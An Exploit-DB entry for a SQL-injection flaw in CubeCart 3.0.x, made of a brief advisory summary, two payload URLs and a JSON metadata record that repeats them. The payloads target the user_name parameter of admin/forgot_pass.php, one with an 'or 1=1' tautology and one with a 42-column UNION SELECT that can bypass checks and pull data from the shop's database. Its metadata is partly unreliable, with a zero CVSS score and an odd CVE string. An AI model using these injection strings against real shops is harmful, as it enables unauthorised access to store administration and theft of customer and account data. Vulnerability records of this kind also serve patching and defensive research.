source: http://www.securityfocus.com/bid/20215/info
CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input.
A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.
http://www.example.com/admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*
http://www.example.com/admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,
23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
{"id": "EDB-ID:28695", "type": "exploitdb", "bulletinFamily": "exploit", "title": "CubeCart 3.0.x admin/forgot_pass.php user_name Parameter SQL Injection", "description": "CubeCart 3.0.x admin/forgot_pass.php user_name Parameter SQL Injection. CVE-29242. Webapps exploit for php platform", "published": "2006-09-26T00:00:00", "modified": "2006-09-26T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/28695/", "reporter": "HACKERS PAL", "references": [], "cvelist": [], "lastseen": "2016-02-03T08:43:48", "viewCount": 2, "enchantments": {"score": {"value": 0.8, "vector": "NONE", "modified": "2016-02-03T08:43:48", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-03T08:43:48", "rev": 2}, "vulnersScore": 0.8}, "sourceHref": "https://www.exploit-db.com/download/28695/", "sourceData": "source: http://www.securityfocus.com/bid/20215/info\r\n\r\nCubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. \r\n\r\nA successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.\r\n\r\nhttp://www.example.com/admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*\r\nhttp://www.example.com/admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,\r\n23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*", "osvdbidlist": ["2006"]}